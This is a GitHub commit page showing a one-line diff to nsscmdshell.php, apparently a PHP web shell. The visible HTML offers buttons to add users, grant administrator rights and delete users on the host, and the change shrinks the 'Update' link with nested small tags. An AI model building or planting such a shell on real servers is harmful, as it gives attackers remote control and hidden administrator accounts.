Skip to content

Commit 07a6dbe

Browse files
committed
Update nsscmdshell.php
1 parent 0364c0d commit 07a6dbe

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

nsscmdshell.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -63,7 +63,7 @@
6363
<br><br>
6464
<button type="submit" name="addUser" title="adds the secified user to the system with the password provided.">Add User</button>&nbsp;<button type="submit" name="userAdmin" title="sets the specified user as adminstrator. only works with sufficient permissions on the current user.">Set Admin</button>&nbsp;<button type="submit" name="userStandard" title="sets the specified user as a standard user. only works with sufficient permissions on the current user.">Set Standard User</button>&nbsp;<button type="submit" name="delUser" title="deletes the specified user from the system. only works with sufficient permissions on the current user.">DelUser</button>&nbsp;&nbsp;&nbsp;&nbsp;<button onClick="window.location.reload();">Clear Console</button>
6565
</form><br>
66-
<a href="?update=true">Update</a><br><br>
66+
<a href="?update=true"><small><small><small>Update</small></small></small></a><br><br>
6767
</div>';
6868

6969
if (isset($_GET['addUser'])){

0 commit comments

Comments
 (0)